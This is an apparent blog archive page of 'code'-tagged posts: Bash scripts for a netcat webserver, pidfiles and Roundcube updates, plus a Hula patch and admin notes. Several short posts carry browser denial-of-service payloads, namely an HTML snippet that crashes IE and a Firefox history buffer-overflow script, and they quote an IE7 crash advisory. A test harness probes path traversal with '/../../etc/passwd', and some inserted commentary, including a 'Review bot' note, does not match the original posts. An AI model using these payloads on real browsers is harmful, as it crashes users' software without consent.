look out honey 'cause I'm using technology

Posts Tagged ‘code’

HOWTO: webserver in 100 lines of Bash

I’m a big Bash fan. I know Perl is the more popular scripting language, and I’m slowly using it more, but hey, if I need something done, I can do it quicker in Bash (keeping in mind that I’m a systems guy, not a dev guy). While at work looking up Bash-related syntax I came across a page describing how to run a webserver with 100 lines of Bash. It uses the old school GNU utility Netcat (nc) for communication between the pipes, and just a ton of basic logic and functions to pass it on to the user. It’s one of those things I look at and can’t believe it works, but it does. Of course security is unknown, as is the original author, but I consider this a reference on how to do networking things in Bash; who knows what I’ll use (parts) of it for. If anyone has details on who originally wrote this I’m all ears.

[sourcecode language='bash']
#!/bin/bash

# Log a timestamped, tab-separated message to stderr.
function debug {
    local severity="$1"
    shift
    local message="$*"

    echo -n "`date -u`" 1>&2
    echo -ne '\t' 1>&2
    echo -n "$severity" 1>&2
    echo -ne '\t' 1>&2
    echo "$message" 1>&2
}

# Sanitize the requested path: keep only the first line, strip leading
# '/', '.' and '-' characters, and drop any dots that follow a '/'.
function fix_path {
    echo -n "$1" | head -n 1 | sed 's|^[/.-]*||' | sed 's|/\.*|/|g'
}

function serve_dir {
    local dir="`fix_path "$1"`"
    if [ "$dir" = "" ]; then
        dir="./"
    fi
    echo 'HTTP/1.1 200 OK'
    echo 'Content-type: text/html;charset=UTF-8'
    echo
    echo LISTING "$dir"
    # The HTML tags in the next two commands were lost from this copy of
    # the script; the <br> line breaks are an assumed reconstruction.
    echo '<br>'
    ls -p "$dir" | sed -e 's|^\(.*\)$|\1<br>|'
}

function serve_file {
    echo 'HTTP/1.1 200 OK'
    echo 'Content-type: application/x-download-this'
    echo
    local file="`fix_path "$1"`"
    debug INFO serving file "$file"
    cat "$file"
}

# Read the request line from stdin and dispatch on the requested URL.
function process {
    local url="`gawk '{print $2}' | head -n 1`"
    case "$url" in
        */)
            debug INFO Processing "$url" as dir
            serve_dir "$url"
            ;;
        *)
            debug INFO Processing "$url" as file
            serve_file "$url"
            ;;
    esac
}

function serve {
    local port="$1"
    local sin="$2"
    local sout="$3"

    while debug INFO Running nc; do

        # nc reads the response from one FIFO and writes the request to the other
        nc -l -p "$port" < "$sin" > "$sout" &
        pid="$!"

        debug INFO Server PID: "$pid"

        trap cleanup SIGINT
        head -n 1 "$sout" | process > "$sin"
        trap - SIGINT

        debug INFO Killing nc

        kill "$pid"
    done

    debug INFO Quitting server
}

function cleanup {
    debug INFO Caught signal, quitting...
    rm -Rf "$tmp_dir"
    exit
}

tmp_dir="`mktemp -d -t http_server.XXXXXXXXXX`"
sin="$tmp_dir"/in
sout="$tmp_dir"/out
pid=0
port="$1"

mkfifo "$sin"
mkfifo "$sout"

debug INFO Starting server on port "$port"
serve "$port" "$sin" "$sout"
cleanup
[/sourcecode]
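Since the script's security is unknown, the piece worth testing first is fix_path, which is the only thing standing between a requested URL and cat or ls. The harness below is an added example, not part of the original script: it runs fix_path over constructed request paths and then applies a resolved-path containment check, which also catches a symlink that leaves the served directory (something a text-only filter cannot see). The names contained and demo are hypothetical, and a readlink that supports -f is assumed.

```bash
#!/bin/bash
# fix_path as in the script above (quotes repaired).
fix_path() {
    echo -n "$1" | head -n 1 | sed 's|^[/.-]*||' | sed 's|/\.*|/|g'
}

# Hypothetical helper, not part of the original script: print the resolved
# path and return 0 only if the request maps to an existing file or
# directory that is still inside DOCROOT once symlinks are followed.
# Assumes a readlink that supports -f (GNU coreutils, BusyBox).
contained() {
    local root rel real
    root="$(readlink -f "$1")" || return 2
    rel="$(fix_path "$2")"
    real="$(readlink -f "$root/$rel")" || return 1
    [ -e "$real" ] || return 1
    case "$real" in
        "$root"|"$root"/*) printf '%s\n' "$real" ;;
        *) return 1 ;;
    esac
}

# Constructed test tree: one public file, plus a symlink that points
# outside the served directory.
demo() {
    local root outside url verdict
    root="$(mktemp -d)"
    outside="$(mktemp -d)"
    echo public > "$root/index.html"
    echo private > "$outside/notes.txt"
    ln -s "$outside" "$root/link"
    for url in /index.html /../../etc/passwd /-rf /.hidden/../x /link/notes.txt; do
        if contained "$root" "$url" > /dev/null; then
            verdict=inside
        else
            verdict=refused
        fi
        printf '%-20s fix_path=%-16s %s\n' "$url" "$(fix_path "$url")" "$verdict"
    done
    rm -rf "$root" "$outside"
}

demo
```

In the original script, serve_file would cat the symlinked file, because fix_path only rewrites the text of the path.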


HOWTO: create a pidfile for a startup script

On the monit mailing list today someone asked how they could monitor a process that didn’t have a pidfile associated with it. Without thinking I jotted this down; there’s likely a better way, but this should work and may be all I need for some init.d scripts for a couple of apps on ramon (the home server). At the beginning of the startup script, define the PIDFILE with the path and the cmd followed by the pid suffix and then just dump the PID number from the ps output into it:

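export PIDFILE="/var/run/${1}.pid"
# The PID is the second column of `ps -fe` output; skip the grep process itself
ps -fe | grep "${1}" | grep -v grep | head -n1 | awk '{print $2}' > "${PIDFILE}"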

Once this is done, monit can monitor it just like it monitors any other process with a PID.  Later, for a shutdown hook, nuke the PIDFILE on the way out.

if [ -f "${PIDFILE}" ]; then
    rm "${PIDFILE}"
fi
### rest of shutdown ###
exit 0

I think that should do it, anyone see a problem with that / a better way?
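A variant that records the PID at launch instead of searching the ps output for a matching name, so the pidfile monit reads cannot end up pointing at an unrelated process. This is an added example, not from the original post; start, running, stop and PIDDIR are hypothetical names, and PIDDIR defaults to a private temporary directory so the sketch runs unprivileged (an init script would use /var/run).

```shell
#!/bin/sh
# Hypothetical helpers, not from the post.
PIDDIR="${PIDDIR:-$(mktemp -d)}"

# running NAME: true only if the pidfile exists and its PID is alive.
running() {
    [ -f "$PIDDIR/$1.pid" ] && kill -0 "$(cat "$PIDDIR/$1.pid")" 2> /dev/null
}

# start NAME CMD [ARGS...]: launch CMD in the background and record the
# PID the shell reports in $!.
start() {
    name="$1"
    shift
    pidfile="$PIDDIR/$name.pid"
    if running "$name"; then
        echo "$name already running as $(cat "$pidfile")" >&2
        return 1
    fi
    "$@" > /dev/null 2>&1 &
    # Write under a temporary name and rename, so a monitor never reads
    # a half-written pidfile.
    echo "$!" > "$pidfile.$$" && mv "$pidfile.$$" "$pidfile"
}

# stop NAME: signal the recorded PID and remove the pidfile (shutdown hook).
stop() {
    pidfile="$PIDDIR/$1.pid"
    [ -f "$pidfile" ] || return 0
    kill "$(cat "$pidfile")" 2> /dev/null || true
    rm -f "$pidfile"
}

# Constructed demonstration: a sleep stands in for the daemon.
start sleeper sleep 30 && running sleeper && echo "sleeper pid $(cat "$PIDDIR/sleeper.pid")"
stop sleeper
```

kill -0 only shows that some process holds the recorded PID, so the pidfile should still be removed on every clean shutdown as in the post.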


Allow Varnish to reuse its shared object

BACKGROUND: The following is a proposal I submitted to the Varnish developers in order to make it simpler to integrate Varnish (an HTTP accelerator for web sites) into production environments. fak3r uses Varnish in front of its webserver, Lighttpd, so it’s likely that the page you’re now reading was served to you not by the webserver, but via Varnish.

Currently Varnish requires a C compiler to be present on the machine it’s running on, since it needs to compile the VCL config file into a shared object each time it starts. During shutdown, Varnish removes this shared object since it will be rebuilt during the next start. This routine repeats regardless of whether anything has changed in the VCL config file, and serves as a road bump to getting Varnish into certain production environments, since traditionally development applications (such as the C compiler) are not allowed in such instances. For now I am putting aside the arguments as to why it is acceptable to have development applications in production instances, since that argument’s outcome will vary in different situations, and I am aiming for a solution that will cover all instances.


crash Internet Explorer with a link

I thought the days of crashing IE with just some malformed code were over; apparently not. It just takes a misplaced wildcard in a style declaration to send it down.
<style>*{position:relative}</style><table><input /></table>
This took out IE on my work computer which is fully patched. I’ve read that people running IE under Wine in Linux have it crash as well, so it’s certainly app dependent. For those of you playing at home, just click here to try it for yourself. Extra credit if you actually save the file on your Windows machine and then try to open it within Windows Explorer! Enjoy.


Firefox 2.0 tweaks

By now you should know that if you surf the web, you should be using Firefox. Earlier this week they released version 2.0 with a host of improvements (many small) and some needed polish. While the jump to 2.0 may have been a bit of a reach, the direction Firefox is heading is always interesting. Of course being an open source project there’s always room for tweaking, and while I now take a much more conservative approach to it, I still think changing some things makes it (much) better. After a recent post on Digg I reworked a fresh copy of 2.0 to have minimal tweaks that don’t overwhelm or cause instability. Here I’ll document my basic changes and welcome comments on them, or any others that users prefer.


Please Listen Closely, As Our Menu Options Have Changed

From the great Freakonomics.com, an article about an online database that’ll get you through the ‘phone trees’ or mazes anytime you have to call some company for customer service. “One solution to Phone Tree Hell is the beautifully named GetHuman database, which provides a nearly encyclopedic list of companies’ phone numbers and the string of menu choices you must press to bypass the phone tree and get to a human. Example: ‘SUNOCO … 800‑278‑6626 … Press 0 five times, then mumble when prompted for an account number.’” I’ve always hit 00000000000, but perhaps some have caught on to that. This is a nice service, I’ll give it a go next time I need to call up one of these places. And why do all of them spout on about, “Please Listen Closely, As Our Menu Options Have Changed”, sorry, but I’m not buying that.


Roundcube Webmail update script

The Roundcube Webmail Project is moving along, and my Roundcube HOWTO install is one of the more popular ones on my site. Today I updated to the latest SVN version, since they’ve recently moved from CVS to SVN for version control, and wrote a script to automate this so I can just run it nightly via cron. Click on ‘Read more…’ to see the script; you should be able to just cut/paste it, set the perms to 755, edit the variables at the beginning to suit your system and run. Of course you’ll need Subversion installed to checkout the code with this script. Feedback is appreciated if you have any suggestions, or come across something that doesn’t work for you.

#!/bin/sh
PATH=${PATH}:/bin:/usr/bin:/usr/local/bin
# Edit these variables to suit your system
WEBROOT="/usr/local/www/data"
RCWM_DIR="roundcubemail-svn"
WWW_USER="www"
WWW_GRP="www"
#
if ! test -d "${WEBROOT}/${RCWM_DIR}"; then
    echo "ERROR: ${WEBROOT}/${RCWM_DIR} not found"
    echo "  create it or redefine the variable in the script"
    exit 1
fi
# Check out into a private temporary directory rather than a fixed,
# predictable path under the world-writable /tmp
WORKDIR=`mktemp -d -t roundcube.XXXXXXXXXX` || exit 1
cd "${WORKDIR}" || exit 1
svn checkout https://svn.roundcube.net/trunk || exit 1
mv trunk/roundcubemail/* "${WEBROOT}/${RCWM_DIR}"
cd / && rm -rf "${WORKDIR}"
chown -R ${WWW_USER}:${WWW_GRP} "${WEBROOT}/${RCWM_DIR}/temp" "${WEBROOT}/${RCWM_DIR}/logs/"
if ! test -f "${WEBROOT}/${RCWM_DIR}/config/main.inc.php"; then
    echo "WARNING: ${WEBROOT}/${RCWM_DIR}/config/main.inc.php not found"
    echo "  edit the existing main.inc.php.dist and rename sans .dist before running"
fi
if ! test -f "${WEBROOT}/${RCWM_DIR}/config/db.inc.php"; then
    echo "WARNING: ${WEBROOT}/${RCWM_DIR}/config/db.inc.php not found"
    echo "  edit the existing db.inc.php.dist and rename sans .dist before running"
fi
exit 0

HOWTO: Fix login issue on Typo

NOTICE: Before you try this, see the update below – this could mess things up if you have more than one user, and you’re not trying to fix the Admin login

fak3r.com runs the latest (greatest?) Typo code, but sometimes this leads to problems. After an update a few days ago I could no longer log in to the site, thus I couldn’t add stories, admin the site or anything. The folks on the Typo-dev list had plenty of suggestions on how to fix it, but led me in the right direction when they just said to delete the user and then recreate it with a new password. This worked, and I’m posting it here in case someone else can’t log in to their Typo instance in the future. Go into your database (mine is MySQL 4.x), switch to your Typo database and enter the following:

delete from users where id=1;

Quit out, fire up your Typo site in a browser and create a new user – done.

UPDATE: Dave from the typo-dev mailing list thinks this isn’t a good idea – his comments:

Think that’s a bad fix – if you have an auto-increment id field on the users table, then when you recreate the user he has a different id. I expect that’s why you can’t edit any of your old posts.

The best fix is to use the console, find the old user

me = User.find(1)

in my case, then reset the password with a

me.password = me.password_confirmation = 'sekrit'

me.save

Later Steven wrote in to talk more about how to get into console:

It’s not a Ruby thing, it’s a Rails thing. You’ll have seen it if you watched any of the screencasts by DHH. In case you haven’t seen any of them, go here:

http://rubyonrails.com/screencasts

this one in particular (or its earlier incarnation) is the one that lit a fire under most folks’ asses to check out rails:

http://media.rubyonrails.org/video/railstake2with_sound.mov

In a nutshell though, from the root of your application, run:

script/console

This will bring up an interactive shell session with your application’s data and environment available.

Lastly, here’s the Console manual for Ruby


IE 7 Beta 2 (and matching DoS attack) released

Amazing, so today Microsoft releases Beta 2 of IE 7, and almost simultaneously comes a tailor made DoS attack! “Overview: A denial of service vulnerability exists within Microsoft Internet Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to crash, and or to execute arbitrary code on the targeted host. Technical Details: When running a specially crafted .html file, urlmon.dll improperly parses the ‘BGSOUND xsrc=file://—’ (approx. 344 dashes) and causes the crash. … Vendor Status: Microsoft was notified. Workaround: Mozilla Firefox.” If you are running IE 7 Beta 2 and want to give it a go, go to that link and construct the code, or simply click here for the proof of concept. I like how this comes up just after the zero day WMF flaw, and how it nicely dovetails into their “Trustworthy Computing” effort (emphasis on effort). “Trustworthy Computing is a long-term, collaborative effort to provide more secure, private, and reliable computing experiences for everyone. This is a core company tenet at Microsoft and guides virtually everything we do. Trustworthy Computing is built on four pillars: Security, Privacy, and Reliability in our software, services, and products; and integrity in our Business Practices.” Sure, sounds like a game plan.


Firefox buffer overflow

There’s a Firefox buffer overflow script listed on Packet Storm. The Javascript can be embedded into HTML and make Firefox log a very long topic line into its history.dat file. Any ensuing Firefox starts will cause a crash due to a buffer overflow. The fix would be to delete the history.dat file, which would be recreated automatically during the next start, but that’s not something most users would know. I’m sure this will be patched quickly, but this has to be the first type of bug I’ve seen targeting Firefox.

function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}

Hula progress on FreeBSD

I’ve been pretty quiet about Hula since I’ve been unable to successfully build *and* run it since r370 (currently Hula is at r609). While I’ve solved and committed all the autogen build issues on FreeBSD, it still won’t run; the controlling hulamanager process just hangs, with no errors or output to help out. On the mailing list this behavior is reportedly due to the (hardlinked) renaming of ‘server messaging server’ to ‘hula messaging’ server, which bombs if you use the filesystem based mdb. Alex sent me this patch:

diff -urNad --exclude=CVS --exclude=.svn ./src/libs/mdb-file/mdbfile.c
/tmp/dpep-work.Qpsn4d/hula-0.1.0+svn472/src/libs/mdb-file/mdbfile.c
--- ./src/libs/mdb-file/mdbfile.c	2005-09-16 12:19:45.000000000 +0100
+++ /tmp/dpep-work.Qpsn4d/hula-0.1.0+svn472/src/libs/mdb-file/mdbfile.c	2005-09-20 20:45:41.000000000 +0100

@@ -3207,8 +3207,8 @@

MDBFile.unload = FALSE;
strcpy(MDBFile.localTree, "\Tree");
-    strcpy(MDBFile.serverDN, "\Tree\Context\Hula");
-    strcpy(MDBFile.replicaDN, "Hula");
+    strcpy(MDBFile.serverDN, "\Tree\Context\Server");
+    strcpy(MDBFile.replicaDN, "Server");
strcpy(MDBFile.base64Chars, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=");

#if defined(LINUX)
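
Review bot: the two `+` lines pass "\Tree\Context\Server" with single backslashes, and `\T`, `\C` and `\S` are not C escape sequences, so a compiler will warn and typically drop the backslash, leaving a DN without separators; the unchanged `strcpy(MDBFile.localTree, "\Tree");` context line has the same problem. If the file really reads this way rather than the backslashes having been lost in posting, they should be written doubled, as in "\\Tree\\Context\\Server". The server and replica names are also hard-coded as literals in both the old and new lines, so defining them once as named constants would keep a later rename from having to touch each strcpy call.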

and it applies cleanly, but yet the same issue occurs. I have a bug written on this, and will try to get back on IRC tomorrow and work on it. Also, due to a request on the hula-dev list, I have added some logic to my gethula script; version 1.7 should now support NetBSD, but I’m waiting for feedback on that. Again, it *should* compile, but I don’t expect it to run…yet.


Zimbra build script released

Here’s my first swing at a hacked together build script to download, build, compile and install the Zimbra Collaboration Suite. If you haven’t been hip to it, Zimbra just kinda appeared out of nowhere, with a pretty nice email/cal webapp that has all the AJAX goodness you could hope for, with true drag and drop, pop up balloons, live searching and more. They have a demo you can play with here, and it’s worth checking out, just to see what’s up. For now my focus for day to day is still on the Hula Project, but to play with Zimbra I needed to hack a script together just so I could get this built on a ‘normal’ Linux distro (in this case my old server, jorge running Gentoo), and not Red Hat Enterprise and Fedora as they had released. I’ve already sent the script to a Zimbra dev, as well as an Ubuntu hacker for testing, so we’ll go from there. First impressions are that it’s a really nice, all in one email/cal server/app presentation. Unlike Hula controlling everything, Zimbra is more of a LAMP application, so it will be interesting to see where they place this in terms of how well it could scale in an enterprise environment.


Deprecated proc and C debugging

While trying to debug Hula on FreeBSD I found that the normal GNU C debugging tools (gdb, truss, ktrace) fail since /proc is no longer on the filesystem, in FreeBSD 6.0, for them to write to. It was deprecated as a security concern and functionality moved to sysctl for 5.x, but for 6.x it’s just gone. I’m looking for a long term solution, but short term was just to recreate /proc on the server and mount it. One liner coming up:

echo "proc /proc procfs rw 0 0" >> /etc/fstab; mount /proc

Since Linux still uses /proc I assume the functionality of sysctl would cover these tools to debug C code somehow and redirect stdin, but I don’t know how. Any FreeBSD C hackers out there with a hint?

